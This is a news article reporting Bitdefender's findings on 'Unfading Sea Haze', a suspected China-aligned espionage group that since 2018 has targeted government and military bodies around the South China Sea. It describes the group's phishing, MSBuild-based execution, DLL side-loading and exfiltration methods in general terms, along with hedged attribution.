'China-aligned' spyware slingers operating since 2018 unmasked at last
Unfading Sea Haze adept at staying under the radar
Bitdefender says it has tracked down and exposed an online gang that has been operating since 2018 nearly without a trace – and likely working for Chinese interests.
A report from the antivirus maker details the miscreants – dubbed Unfading Sea Haze – and their methods for breaking into Windows PCs and infecting them with data-stealing spyware.
The group's attacks – which have hit at least government and military targets – were "sophisticated" and focused on "flexibility and evasion techniques," it's claimed.
The origin and ultimate goals of Unfading Sea Haze aren't absolutely clear to Bitdefender, but it claims with confidence that the attacks it investigated don't belong to an already known outfit. The country of origin for the crew is likely China according to the report citing Unfading Sea Haze's attacks on nations located in or around the South China Sea, use of tools popular in China, and a specific technique that bears resemblance to another Chinese state-sponsored entity, APT41.
None of this is a slam-dunk in terms of attribution, and could be deliberate obfuscation, but still, now you know.
The South China Sea is a strategically important area for China, and many countries lay claim to part of it – such as Malaysia, the Philippines, and Vietnam. The Middle Kingdom notably claims nearly all of it, as marked by the so-called Nine-Dash Line.
"The lack of a definitive match and the presence of these suggestive clues paint a picture of a sophisticated threat actor with connections to the Chinese cyber ecosystem," the investigators argue.
The report observes Unfading Sea Haze made its initial intrusion into Windows computer systems at least six years ago. Bitdefender was able to confirm the attackers used spear phishing in order to gain access.
- Stifling Beijing in cyberspace is now British intelligence's number-one mission
- Governments issue alerts after 'sophisticated' state-backed actor found exploiting flaws in Cisco security boxes
- China creates 'Information Support Force' to improve networked defence capabilities
- UK elections are unaffected by China's cyber-interference, says deputy PM
Spear phishing usually indicates that a team is particularly interested in a handful of targets, such as engineers to steal blueprints from or politicians and activists to snoop on. And indeed, we're told at least eight organizations were hit by the gang, most of which were either government agencies or military operations.
According to the research Wednesday, Unfading Sea Haze sent emails with zip archives attached containing .LNK files disguised as documents that when opened executed a string of Windows commands.
The commands would download a file from an Unfading Sea Haze server to disk, wait ten seconds, and then execute the file via MSBuild.
In March this year, the crew improved its execution to avoid writing the downloaded file to storage, using a combination of Powershell and MSBuild, and instead run it from memory, which can help avoid detection.
The rogue downloaded code would set up scheduled tasks that run harmless programs that load malicious DLL files: Those DLLs would spy on the user using keyloggers, copy sensitive data stored in browsers, and scan portable drives to generate file listings.
All of this data, including any files to exfiltrate, would be sent off to the snoops via FTP using Curl, using first hardcoded credentials and then ones dynamically generated.
Dangerous due to their ability to adapt
The Bitdefender report argues that part of the attacks' effectiveness was thanks to "poor credential hygiene and inadequate patching practices on exposed devices and web services." In other words, the eight victim organizations – most of which were either government agencies or military systems – had lax security in some way or another.
On the other hand, Unfading Sea Haze didn't get by just on luck. "The extended period of Unfading Sea Haze's invisibility, exceeding five years for a likely nation-state actor, is particularly concerning," Bitdefender notes. "Their custom malware arsenal, including the Gh0st RAT family and Ps2dllLoader, showcases a focus on flexibility and evasion techniques."
Attackers affiliated with Unfading Sea Haze have progressively changed both their methods and their tools. Since the outfit was only just unveiled, innovations might have been pursued as part of a plan, rather than a reaction to close calls or other incidents.
China-backed cyber-snoops aren't anything new, and they've been prolific on a global scale, having compromised at least 70 organizations and targeted more than 116 spread across 23 countries. Cynics might say Unfading Sea Haze went undetected because it's not that significant in the grand scheme of things, though Bitdefender argues otherwise, saying the crew went after high-level targets.
We asked Bitdefender for further details, and the firm declined. "We understand the public's interest, but for security reasons, we can't disclose specific countries or organizations," senior director Steve Fiore explained to The Register.
"However, we can confirm the targets resemble those typically linked to Chinese nation-state actors. Our Bitdefender Labs and MDR teams are continuously monitoring the situation to provide further insights."
See the report for technical details, including indicators of compromise, on how to detect and block attacks similar to those by Unfading Sea Haze. ®